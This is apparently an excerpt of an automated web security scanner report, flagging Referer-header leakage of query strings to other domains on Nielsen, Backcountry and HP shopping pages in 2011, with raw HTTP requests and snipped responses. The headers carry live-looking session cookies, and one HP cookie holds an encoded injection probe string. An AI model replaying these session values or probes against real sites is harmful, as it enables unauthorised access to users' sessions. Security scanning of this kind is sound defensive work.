If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://nielsen.com/content/corporate/us/en/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/corporate/us/en/search.html?q=mobile+tv+internet HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 49920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...
<div align="center"><a href="http://www.linkedin.com/companies/the-nielsen-company" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif" width="32" height="32" alt="Find us on LinkedIn">
...[SNIP]...
<div align="center"><a href="http://www.facebook.com/nielsencompany" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif" width="32" height="32" alt="Find us on Facebook">
...[SNIP]...
<div align="center"><a href="http://twitter.com/nielsenwire/" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/twit.gif" width="32" height="32" alt="Follow us on Twitter">
...[SNIP]...
<div id="menu4" class="menu" >


<a href="http://www.nielsenwire.com" onclick="clickEvent('tabLink4', 'false');" target="new">
Nielsen Wire
</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://huff.to/q3n3dA' target='_blank'>Facebook More Popular Than Any Other Website--By A Lot: Nielsen (Huffington Post)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/q16DiG' target='_blank'>Obama&#039;s Jobs Plan Speech Garners Large TV Audience (International Business Times)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://smrt.io/q5RzLb' target='_blank'>Water concerns trump global warming worries&#44; Nielsen says (SmartPlanet)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qcUsP9' target='_blank'>Indians prefer eco-friendly products (Business Standard)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qYUDBv' target='_blank'>Climate change concern tumbles in US and China (Guardian)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bloom.bg/n5cOxO' target='_blank'>Why Are India&#039;s Women So Stressed Out? (Bloomberg)</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-nielsen&amp;cg=com&amp;cc=1&amp;ts=noscript" width="1" height="1" alt=""/>
</div>
...[SNIP]...

7.2. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/practices/cross-platform-audience-behavior.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/en/practices/cross-platform-audience-behavior.html?q=mobile+tv+internet HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 50464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...
<div align="center"><a href="http://www.linkedin.com/companies/the-nielsen-company" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif" width="32" height="32" alt="Find us on LinkedIn">
...[SNIP]...
<div align="center"><a href="http://www.facebook.com/nielsencompany" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif" width="32" height="32" alt="Find us on Facebook">
...[SNIP]...
<div align="center"><a href="http://twitter.com/nielsenwire/" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/twit.gif" width="32" height="32" alt="Follow us on Twitter">
...[SNIP]...
<div id="menu4" class="menu" >


<a href="http://www.nielsenwire.com" onclick="clickEvent('tabLink4', 'false');" target="new">
Nielsen Wire
</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://huff.to/q3n3dA' target='_blank'>Facebook More Popular Than Any Other Website--By A Lot: Nielsen (Huffington Post)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/q16DiG' target='_blank'>Obama&#039;s Jobs Plan Speech Garners Large TV Audience (International Business Times)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://smrt.io/q5RzLb' target='_blank'>Water concerns trump global warming worries&#44; Nielsen says (SmartPlanet)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qcUsP9' target='_blank'>Indians prefer eco-friendly products (Business Standard)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qYUDBv' target='_blank'>Climate change concern tumbles in US and China (Guardian)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bloom.bg/n5cOxO' target='_blank'>Why Are India&#039;s Women So Stressed Out? (Bloomberg)</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-nielsen&amp;cg=com&amp;cc=1&amp;ts=noscript" width="1" height="1" alt=""/>
</div>
...[SNIP]...

7.3. http://www.backcountry.com/store/cart/add.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; CART=; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713387819; __ar_v4=; c49=PDP%3ABackcountry.com%20Gift%20Certificate; s_sq=bcbackcountry%3D%2526pid%253DPDP%25253ABackcountry.com%252520Gift%252520Certificate%2526pidt%253D1%2526oid%253Dhttp%25253A//content.backcountry.com/images/bcs/product_detail/add_to_cart.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: evans
Content-Length: 29511
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:11:53 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<body id="cart" class="bcs">


<script type="text/javascript" src="//media.richrelevance.com/rrserver/js/1.0/p13n.js"></script>
...[SNIP]...
<li id="helpme">
           <a name="help" rel="nofollow" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/kb-8572871580548821431/front_page!PAGETYPE?VisitorProfile=BCS" class="last_link">Help</a>
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...
</p>
                       <a name="domestic_and_military_shipping" rel="nofollow" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239669&amp;action=view">Domestic and US Military Shipping</a><br />
                       <a name="international_shipping" rel="nofollow" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239532&amp;action=view">International Shipping</a>
...[SNIP]...
<li id="outlet"><a name="outlet" href="http://www.departmentofgoods.com/" target="_new">Outlet</a>
...[SNIP]...
<li><a rel="nofollow" name="contact_us" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239499&amp;action=view">Contact Us</a>
...[SNIP]...
<li><a rel="nofollow" name="help_center" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/kb-8572871580548821431/front_page!PAGETYPE?VisitorProfile=BCS">Help Center</a>
...[SNIP]...
<li><a rel="nofollow" name="return_policy" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239621&amp;action=view&amp;MESSAGEVAR!home=no&amp;MESSAGEVAR!cookie=no">Return Policy</a>
...[SNIP]...
<li><a name="about_backcountry" href="http://www.backcountrycorp.com/corporate/section/1/store/bcs/store_detail.html">About Backcountry</a>
...[SNIP]...
<li><a name="jobs" href="http://www.backcountrycorp.com/corporate/section/2/jobs.html">Jobs</a>
...[SNIP]...
<li><a name="affiliate_program" href="http://www.backcountrycorp.com/corporate/section/5/afp/bcs-4-4/Program_Overview.html">Affiliate Program</a>
...[SNIP]...
<li><a rel="nofollow" name="group_sales" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=242956&amp;action=view">Group Sales</a>
...[SNIP]...
<li><a name="press_media" href="http://www.backcountrycorp.com/corporate/section/3/press_media.html">Press / Media</a>
...[SNIP]...
<li><a name="tw" href="http://twitter.com/backcountrycom" target="_blank" id="twitter_link">Follow us on Twitter</a>
...[SNIP]...
<li id="f_shipping"><a rel="nofollow" name="free_shipping" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239669&amp;action=view">Free Shipping</a>
...[SNIP]...
<li id="guarantee"><a rel="nofollow" name="100_guaranteed" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239621&amp;action=view">100% Guaranteed</a>
...[SNIP]...
<li id="experts"><a rel="nofollow" name="talk_to_gear_experts" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239499&amp;action=view">Talk to Gear Experts</a>
...[SNIP]...
</ul>
       
<iframe src="http://www.facebook.com/plugins/likebox.php?id=5461604986&amp;width=292&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:227px; height:75px; background:#E6E3D4; margin-top:20px; border:1px solid #CBC7B9"></iframe>
...[SNIP]...
<li id="bizRate"><a name="4_years_in_a_row" href="http://www.bizrate.com/boutique/2007circleofexcellence.html">BizRate Award Winner<br />
...[SNIP]...
<li id="internet_retailer"><a name="best_of_the_best" href="http://www.internetretailer.com/article.asp?id=20674">Internet Retailer Top 50<br />
...[SNIP]...
</script>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.7.0/build/animation/animation-min.js&amp;2.7.0/build/connection/connection-min.js&amp;2.7.0/build/datasource/datasource-min.js&amp;2.7.0/build/autocomplete/autocomplete-min.js&amp;2.7.0/build/dragdrop/dragdrop-min.js&amp;2.7.0/build/container/container-min.js&amp;2.7.0/build/imageloader/imageloader-min.js&amp;2.7.0/build/selector/selector-min.js&amp;2.7.0/build/slider/slider-min.js&amp;2.7.0/build/menu/menu-min.js&amp;2.7.0/build/element/element-min.js&amp;2.7.0/build/button/button-min.js&amp;2.7.0/build/history/history-min.js&amp;2.7.0/build/get/get-min.js"></script>
...[SNIP]...
<!-- mercent tag start -->
<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://link.mercent.com/image.ashx?merchantID=Backcountry" style="display: none;"/>
</noscript>
...[SNIP]...
<noscript>
<img src="http://link.mercent.com/image.ashx?merchantID=Backcountry&type=shopper&id=TUtKhM3y&customerID=" style="display: none;"/>
</noscript>
...[SNIP]...

7.4. http://www.shopping.hp.com/design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...
<!--stopindex-->


<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_screen_003366.css" rel="stylesheet" type="text/css" media="screen">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_handheld_003366.css" rel="stylesheet" type="text/css" media="handheld">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_print_003366.css" rel="stylesheet" type="text/css" media="print">


<script language="JavaScript">
...[SNIP]...
<!--stopindex-->

<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
<script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/search_utils.js"></script>
...[SNIP]...
<a href="http://www.hp.com/?mtxs=logo&mtxb=store&jumpid=in_R329_prodexp%2Fhhoslp%2Fsplit%2Fhome" title="HP.com home"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_logo_new.png" alt="HP.com home" border="0"></a>
...[SNIP]...
<h2 class="themeheader mb10" style="float: left; width: 73%;">


<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/topnav_phone_icon.gif" height="20px" width="20px" align="absmiddle" alt="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este">

<span title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" alt="Call an HP Home & Home Office agent now.&#10Espa&ntil
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;
<a href="http://www.shopping.hp.com/webapp/shopping/help.do" class="themelink">
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;<span id="signInLink">
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/cart_detail.do?view_cart=checkout" title="Proceed to shopping cart and checkout" style="cursor:pointer"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="14" height="13" border="0" alt="24 items in the cart" align="absmiddle"></a>
...[SNIP]...
</a>&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="19" height="14" border="0" alt="Shopping Cart" align="absmiddle" id="cart">24 items: $8,159.76
</p>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=product_detail&product_code=TD367AA%23ABA"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/td367aa_42.gif" alt="Microsoft Office Home And Student 2010 PKC (1 user, product key card)" width="40" height="40" border="0"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=product_detail&product_code=BV704AA%23ABA"><img src="http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/preview_fmt/bv704aa_main.jpg" alt="HP Pavilion p7-1020 Desktop PC" width="40" height="40" border="0"></a>
...[SNIP]...
<a href="javascript:openWin('http://www.shopping.hp.com/webapp/shopping/calculate_tax_shipping.do?runDM=false',325,700);" title="Pop-up window for shipping tax calculator"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/calc_icn.gif" width="14" height="19" border="0" title="Pop-up window for shipping tax calculator" alt="Pop-up window for shipping tax calculator"></a>
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/cart_detail.do?view_cart=checkout" title="Proceed to shopping cart and checkout"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/stdnav/button_view_cart_checkout.gif" border="0"></a>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<!-- Modified    for    NG3    -->


<script    type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/topNav.js"></script>
...[SNIP]...
<h4 class="navDropdownsLink"    style="padding: 4px 10px;"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hho_icon_home.gif"    title="Home" width="17"    height="20"    border="0"/></h4>
...[SNIP]...
http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Mini&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mini_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb1_70.gif" width="70"    height="70"    border="0" title="Mini Netbooks"></a>
...[SNIP]...
app/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb2_70.gif" width="70"    height="70"    border="0" title="Everyday Computing laptop PCs"></a>
...[SNIP]...
hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Ultra-Portable&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_ultra-portable_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb3_70.gif" width="70"    height="70"    border="0" title="Ultra-Portable laptop PCs"></a>
...[SNIP]...
/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb4_70.gif" width="70"    height="70"    border="0" title="High Performance laptop PCs"></a>
...[SNIP]...
